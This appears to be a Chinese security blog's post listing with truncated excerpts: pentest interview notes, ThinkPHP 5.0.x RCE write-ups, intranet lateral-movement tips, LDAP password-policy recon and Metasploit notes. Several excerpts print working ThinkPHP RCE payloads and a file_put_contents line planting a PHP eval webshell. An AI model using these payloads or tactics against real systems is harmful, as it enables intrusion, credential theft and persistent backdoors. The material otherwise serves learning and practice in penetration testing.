weixin_43570648的博客

这些是今年3-9月份各个大厂问我的一些问题，这里给出了我的一些解决方案，包括阿里，腾讯，字节，美团问道的一些问题，当然有一些问题我没有给出答案（涉及到自己的一些技巧），也有一些常规问题没有罗列，比如自我介绍，项目经验，还有根据你的简历问的东西我就没有罗列出来，以及一些非常简单的问题我也没有罗列出来，比如sqlmap --os-shell原理是啥，ok1.shiro反序列化shiro550（命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值）

原文链接：（我直接粘贴过来没有图片）https://xz.aliyun.com/t/9773前言有一段时间没有写文章了，也不知写什么，毕竟从攻击方换成防守方，乙方换到甲方，还有些许不适应。。。但还是决定把自己接触渗透所积累的东西也拿出分享，不管糟粕，还是大伙觉得我分享的有用（那阿鑫自然是很开心），希望能帮到还在学习路上的朋友，文章若有错误，请及时联系我指出，我也不想误导才学习的朋友。此外，本文为口嗨文，基本在说思路，没有实操。web端(1)信息收集收集cms信息：1.通过云溪，wapplayz

之所以写这篇文章呢，是觉得大时代的发展，我们这个专业越来越受到重视了，所以，阿鑫也想以自己的一些拙见，能帮到想入门的朋友1.关于网上的培训如果你想快速获得知识，培训无疑是最快最有效的捷径，但是我不建议大家去，第一.讲的东西很肤浅，自学很快的。第二.价格很高.第三.讲师讲的终是他的理解，你无法有自己学的那么深刻，导致后面学的东西无法迭代已经适应新的东西，人话总结，不管是web，还是内网，还是代码审计，ctf，都他妈不要去培训。2.自学这是很难的，你才入门一个方向，什么都不知道，什么都想学，但是又不知道

还是老规矩，进来直接用exp将phpinfo打出来（tp的版本为5.0.13）但是我们用常规的日志包含，却找不到我们的日志在哪里.后面才知道，我们get去请求也是无法请求到的，因为日志不在网站的绝对路径，只能通过post去fuzzing日志此时用session去包含，不行，因为session过期过的很快，所以一直拿不下来，后面问了公司的表哥才知道，这种情况可以用session的文件竞争来绕过，将其拿下。其他常规的exp，file_put_content wget这些，都是打不进去的，这个时候我

朋友拿下了一个webshell，想打打内网，但是无奈进不去，特此帮兄弟看看，这里也记录一下吧。先看杀软，此机器没有杀软.然后在看有没有域，没有域.然后我们就去抓密码，可能存在一种情况，就是本地的administrator的密码，可能是域管的密码。但是在这台机器上，我们并没有抓到administrator的密码这个时候就有两种思路。1.机器能出网，直接上cs。抓到本地管理的密码，横向撞一波，然后上去，抓一波密码，如果有域账号，就用域账号去装域机器，抓域管的账号密码。抓到大体上渗透就借宿。如果没有抓

1.密码策略收集1.net accounts /domain 如果是域用户，用命令查看 （域内）2.运用kali的ldapsearch来收集 （域外） dapsearch -x -H ldap://192.168.1.1:389 -D “CN=testa,CN=Users,DC=test,DC=com” -w DomainUser123! -b “DC=test,DC=com” | grep replUpToDateVector -A 13 ps

目标常规报错直接说版本tp5.0.9，然后尝试payload_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo顺便看了哈disable_function基本执行命令的payload都被禁了还好payload多，直接拿下s=file_put_contents(‘dd.php’,’<?php @eval($_POST[1]);’)&_method=__

首先我们点开电脑自带的Microsoft Edge选择箭头所指的地方然后单击f12，选择ie7/ie8即可

小弟也第一次参加hw，经过5天hw，确实也学到了许多的东西，但就本次分享而言，我分享一些我认为在hw里面值得注意的东西以及一些小技巧一.信息收集信息收集这个多西当然都是老生常谈了，你收集的东西越多，能打的方向也就越多，当然,hw给你打的资源的格式一般为单位名称，系统名称，域名，IP地址。当然，其他的资源可能都大同小异。网上都有很多信息收集的东西，都是那一套，扫端口，找子域名，看站有没有泄露什么东西，什么敏感文件，看网站的框架。现在，我就先给大家梳理一下。信息收集的本质有2个，一是把现有的资源扩大，能

记一次tp5.0.11rce今天很有感触，我决定从今天开始记录我在ax的点点滴滴，自己的学长都是一步一个脚印走出来，加油，阿鑫。首先进入网站，xxxx/ 随便输入xxx/admin 然后报错然后去网上搜索tp5.0.11的exp打，然后找了一个exp，这tm不直接渗透结束？然后看了一下函数，禁止了system,assert函数这里再附上几个exp，如果没有禁，可以直接打，_method=__construct&filter[]=system&method=get

当我们想批量找注入的时候，这是就会想到某些批量Url获取的软件，但是可能存在后门，有时又因为玄学问题不运行，这不扯吗，于是，就干脆自己写一个脚本，批量获取百度的url代码如下# -*- coding: utf-8 -*from lxml import etreeimport requestsimport timeimport reimport urllib.requestDOMAIN = "https://www.baidu.com/s?wd="a = input('请输入url:')b

其实MSF大部分都用来用ms17_010,其实MSF还有很多功能，比如用他来打打CMS的exp呀，还有对端口的攻击，生成payload,在此，我也记一个笔记，供大家分享。1.首先基于MSF的资产收集网络主机收集:use auxiliary/scanner/discovery/udp_probeuse auxiliary/scanner/discovery/udp_sweepuse au...